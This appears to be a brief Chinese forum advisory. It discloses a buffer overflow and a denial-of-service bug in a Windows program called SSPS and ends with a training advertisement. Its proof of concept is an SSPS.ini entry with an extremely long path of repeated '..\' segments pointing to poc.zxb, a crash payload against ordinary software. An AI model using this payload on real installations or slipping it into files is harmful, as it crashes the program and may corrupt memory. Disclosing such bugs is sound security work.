程序下载地址http://www.skycn.com/soft/appid/13261.html 该存在2枚内存破坏漏洞。
漏洞1：处理某地址时由于地址过长，造成缓冲区溢出漏洞。
漏洞2：处理zxb文件错误，存在拒绝服务漏洞。

漏洞内容：
该存在2枚内存破坏漏洞。
漏洞1：处理某地址时由于地址过长，造成缓冲区溢出漏洞。
漏洞2：处理zxb文件错误，存在拒绝服务漏洞。

漏洞1poc: 打开程序路径下的SSPS.ini文件。把作息表一项改成

作息表=c:\program files\ssps\作息表\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\poc.zxb

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课